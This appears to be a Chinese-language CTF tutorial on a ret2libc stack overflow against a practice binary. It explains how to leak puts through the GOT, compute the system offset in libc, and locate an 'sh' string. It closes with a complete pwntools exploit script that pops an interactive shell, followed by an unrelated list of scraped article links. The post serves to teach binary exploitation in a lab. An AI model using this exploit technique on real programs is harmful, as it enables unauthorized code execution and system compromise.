背景知识

fflush 函数,清理缓冲区。

fflush(stdout) 一次性输出以上缓冲区所有数据

read(0,&buf,0xAu) 0代表标准输入,标准输出1,标准错误2,&buf 向buf输入。输入 长度为A的值的长度,数据类型U代表的是无符int

strtol(&buf,v3,v4) 是将输入的数据的ASCII码转换成数值存入 buf 中去

read 中接受的是ascii码,所以使用python方法应该是 io.send(str('某个地址'))

使用got 查看运行的GOt 表中的信息

其中0x80 开始的就是未加载的表象地址。而0xf 开始一般都是libc中的地址



由上图可以看出,在 plt 中无 system 函数

利用查找字符串也未发现 /bin/sh

构建shell思路

当调试的时候查询到 puts 函数的时候,因为在 libc 中是固定的, 所以system 相对于puts 的位置是固定的,得到了puts 的地址加上偏移量即可获得system 地址

libc=ELF('./libc-2.23.so')

libc.symbols["system"] //获取方法和获取当前变量一样

libc.symbols["puts"]

同样也可以使用ida进行获取



puts



相差的绝对值为 system - puts =

获取 puts 的 Got 地址。

from pwn import *

io=process('./ret2libc3')

elf=ELF('./ret2libc3')

elf.got['puts']



获得elf中put的 puts 地址 134520860

将该值传到服务器(这里是本地进程)

See_something 函数获取put在远程(这里是本地测试)的地址。



地址为0xf7daecd0 以 f7 开头的一般都是 libc 地址

获取sh 地址

获取到fflush 存储的地址,读取由sh开始的地址,当读取完sh 就会读取到 %00 。

即可完成字符串sh 的读取

netx(elf.search(b"sh\0x00"))

利用链

在复制过程中 src 的内容过长(0x100),导致 dest 之外的内容被覆盖。

src 内容来自于用户输入。

(注:默认情况下使用的libc文件为本机文件,使用ldd ret2libc3 -v查看相关信息)

payload

from pwn import *

io=process("./ret2libc3")

elf=ELF("./ret2libc3.1")

libc3=ELF("/lib/i386-linux-gnu/libc.so.6")

io.sendlineafter(" :",str(elf.got["puts"]))

io.recvuntil(b' : ')

puts_addr=int(io.recvuntil(b'\n',drop=True),16)

base_addr=libc3.symbols["system"]-libc3.symbols["puts"]

print(base_addr)

payload=flat(cyclic(60),puts_addr+base_addr,0xdeadbeef,next(elf.search(b"sh\x00")))

print(payload)

io.sendlineafter(b" :",payload)

print(io.recv())

io.interactive()

ret2libc--ROP(pwn)漏洞入门分析的更多相关文章

  1. [web安全原理分析]-SSRF漏洞入门

    SSRF漏洞 SSRF漏洞 SSRF意为服务端请求伪造(Server-Side Request Forge).攻击者利用SSRF漏洞通过服务器发起伪造请求,就这样可以访问内网的数据,进行内网信息探测或 ...

  2. Linux下pwn从入门到放弃

    Linux下pwn从入门到放弃 0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell. 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行 ...

  3. Ripple 20:Treck TCP/IP协议漏洞技术分析

    本文由“合天智汇”公众号首发,作者:b1ngo Ripple 20:Treck TCP/IP协议漏洞技术分析 Ripple20是一系列影响数亿台设备的0day(19个),是JSOF研究实验室在Trec ...

  4. iot漏洞入门

    路由器漏洞入门 下载项目https://github.com/praetorian-inc/DVRF 安装quem sudo apt install qemu-user-static 安装gdb-mu ...

  5. [web安全]Web应用漏洞攻击分析与防范

    网站攻击主要分为以下几类: (1) sql注入攻击 SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.它是利 ...

  6. Google发布SSLv3漏洞简要分析报告

    今天上午,Google发布了一份关于SSLv3漏洞的简要分析报告.根据Google的说法,该漏洞贯穿于所有的SSLv3版本中,利用该漏洞,黑客可以通过中间人攻击等类似的方式(只要劫持到的数据加密两端均 ...

  7. 关于 target="_blank"漏洞的分析

    创建: 于 八月 30, 2016 关于 target="_blank"漏洞的分析  一.漏洞详情:首先攻击者能够将链接(指向攻击者自己控制的页面的,该被控页面的js脚本可以对母页 ...

  8. 美链BEC合约漏洞技术分析

    这两天币圈链圈被美链BEC智能合约的漏洞导致代币价值几乎归零的事件刷遍朋友圈.这篇文章就来分析下BEC智能合约的漏洞 漏洞攻击交易 我们先来还原下攻击交易,这个交易可以在这个链接查询到. 我截图给大家 ...

  9. Heartbleed心脏出血漏洞原理分析

    Heartbleed心脏出血漏洞原理分析 2017年01月14日 18:14:25 阅读数:2718 1. 概述    OpenSSL在实现TLS和DTLS的心跳处理逻辑时,存在编码缺陷.OpenSS ...

随机推荐

  1. 深夜,我偷听到程序员要对session下手……

    我是一个web服务器 我是一个web服务器,我的工作是给人类提供上网服务,我每天要为数以万计的人提供网页浏览服务. 已经是深夜了,我还在和手下几个兄弟为了一件事紧张讨论着. "老大,现在咱们 ...

  2. CCNP:重发布及实验

    重发布(又:重分布.重分发):一台设备同时运行于两个协议或两个进程,默认从两端学习到的路由条目不共享:重发布技术就是人为的进行共享. 一  满足: 1.必须存在ASBR --- 自治系统边界路由器-- ...

  3. nginx安装步骤

    1.下载地址:下载nginx压缩包wget -c https://nginx.org/download/nginx-1.10.1.tar.gz2.配置nginx安装所需的环境yum install g ...

  4. explain为mysql关键字,不能作为表字段创建

    在用jpa自动建表时,字段名命名为了explain,发现报实体类与数据库表字段不一致的错,查询才发现explain是mysql的关键字,无法作为表字段建立,特此记录

  5. 「ExLucas」学习笔记

    「ExLucas」学习笔记 前置芝士 中国剩余定理 \(CRT\) \(Lucas\) 定理 \(ExGCD\) 亿点点数学知识 给龙蝶打波广告 Lucas 定理 \(C^m_n = C^{m\% m ...

  6. 【网络协议】TCP/IP:数据链路层

    物理层负责把计算机中的0.1数字信号转换为具体传输媒介的物理信号(电压的高低.电波的强弱.光的闪灭) 数据链路层协议定义了(通过通信介质互连的设备间的)数据传输规范 (常见的通信介质有同轴电缆.双绞线 ...

  7. Jmeter之『如果(If)控制器』

    判断方法 ${__jexl3("${projectName}"=="${targetDir}",)} ${__groovy("${projectNam ...

  8. JavaScript查找字符串中给定字符出现的位置以及次数

    要求: 给定字符串oabcoefoxyozzopp,要求输出字符o出现的位置和次数. 实现思路: 先查找第一个o出现的位置 然后只要判断indexOf返回的结果,若不是-1,则继续往后查找 因为ind ...

  9. c#类(class)

    类 类的定义是以关键字class开始的,后面跟类的名称,类的主题包含一个花括号里,下面是类定义的一般格式. <access specifier> class class_name { // ...

  10. ASP。NET MVC警告横幅使用Bootstrap和AngularUI Bootstrap

    Watch this script in action - demo 下载Source Code from GitHub 下载Source Code from CodeProject (1.1 MB) ...